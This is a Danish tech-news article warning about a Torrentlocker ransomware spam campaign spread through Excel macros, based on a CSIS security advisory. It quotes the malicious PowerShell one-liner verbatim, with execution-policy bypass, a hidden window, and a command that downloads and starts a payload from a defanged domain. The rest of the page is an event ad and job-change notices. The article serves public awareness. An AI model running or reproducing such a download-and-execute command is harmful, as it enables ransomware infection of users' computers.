Danmark ramt af nyt ransomware-angreb: Du skal ikke åbne denne mail

Danmark rammes i disse dage af en bølge af ondsindet ransomware, der kan låse din computers filer.

Artikel top billede

Danmark er mål for endnu en spamkampagne fra it-kriminelle, der bærer en ransomware i Torrentlocker-familien.

Det skriver sikkerhedsfirmaet CSIS i en sikkerhedsadvarsel.

Den ondsindede email ligner de fleste andre spam-emails for tiden med en tilsyneladende personlig besked på dansk og et tilknyttet Excel-dokument.

Hvis denne fil åbnes af en uforsigtig modtager og får en tilknyttet makrokode aktiveret ved at slå Excels beskyttelsestilstand fra, vil brugeren ende med en krypteret computer.

Du kan se et eksempel på mailen i toppen af artiklen. 

Aktiveres automatisk 

Makrokoden henter automatisk selve ransomware-programmet ned fra et ondsindet domæne, der via Windows' powershell-framework henter ransomware i Torrentlocker-klassen ned og afvikler programmet.

Det vil resultere i en låst computer og formodentligt et krav om en løsesum.

Funktionen ses udført via følgende powershell i en sikret form fra CSIS:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHELl.exE -ExeCuTiONPoliCY BYpaSS -nOProfilE -WIndoWsTyle hiddeN (nEw-objeCT SySTEM.NET.WeBcLIeNt).dOWnLoadFIle('http://ltmp.applepice[.]pl/file/set.rte','C:\Users\[%brugerkonto%]\AppData\Roaming.eXE');staRT-PrOcESS 'C:\Users\[%brugerkonto%]\AppData\Roaming.EXe'

Alle bør derfor være opmærksomme, hvis de modtager en mail med et enkeltstående xls-dokument, der ikke giver mening, og særligt hvis det kommer fra en ukendt email-adresse.

Angrebet minder i høj grad som et lignende angreb fra sidste uge, hvor ransomwaren blev aktiveret af en vedhæftet zip-fil.

Det fik i sidste uge CSIS til at højne sin trusselvurdering til 4 ud af 5.  

Læs også: Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

Annonce

Event: Computerworld Summit 2027 - Aarhus

Digital transformation | Aarhus C

Styrk din digitale strategi med konkret brug af AI og ny teknologi. Mød 250 it-professionelle, få indsigter, løsninger og netværk på én dag. Computerworld Summit i København viser hvordan teknologi skaber forretningsværdi – her og nu.

25. maj 2027 | Gratis deltagelse

Navnenyt fra it-Danmark

Arctic Wolf Networks har pr. 3. august 2026 ansat Johnny Krogsboll som Head of Sales Engineering for Norden.Med base i Stockholm får han ansvaret for Arctic Wolfs samlede Sales Engineering-organisation i den nordiske region.<br /><br />Johnny Krogsboll skal være med til at udbygge Arctic Wolfs tilstedeværelse i Norden og hjælpe virksomheder og organisationer med at stå stærkere over for et stadig mere komplekst cybertrusselsbillede. Det skal blandt andet ske i tæt samarbejde med Arctic Wolfs vigtigste kanalpartnere i regionen.<br /><br />Gennem sin karriere har Johnny Krogsboll arbejdet med og rådgivet virksomheder hos blandt andre Hewlett-Packard, Trend Micro og Palo Alto Networks med fokus på at skabe konkret værdi af deres teknologiinvesteringer. Nyt job

Johnny Krogsboll

Arctic Wolf Networks

Genetec har pr. 1. august 2026 ansat Jan Julin som Channel Account Executive. Han skal især beskæftige sig med styrke samarbejdet med partnere og kunder i Danmark, Finland og Baltikum. Han kommer fra en stilling som Senior Business Development Manager hos Dahua Technology. Han har tidligere beskæftiget sig med videoovervågning, adgangskontrol, sikkerhedsteknologi, salg og forretningsudvikling. Nyt job

Jan Julin

Genetec

Norriq Danmark A/S har pr. 2. februar 2026 ansat Andreas Dyngberg Pedersen som Solution Architect. Han skal især beskæftige sig med at sætte de overordnede rammer for leverancerne med afsæt i best practice og skalerbarhed. Han kommer fra en stilling som Solution Architect hos Impact commerce. Han er uddannet Hos EUC Syd som Datatekniker og Programmering. Nyt job

Andreas Dyngberg Pedersen

Norriq Danmark A/S

LCG har pr. 1. september 2026 ansat Thomas Wong, 47 år,  som Director of Cyber & Risk Advisory. Han skal især beskæftige sig med Ansvar for at udvikle LCG’s rådgivning inden for cybersikkerhed, cyberrisiko og GRC. Han kommer fra en stilling som VP of security hos Atea. Nyt job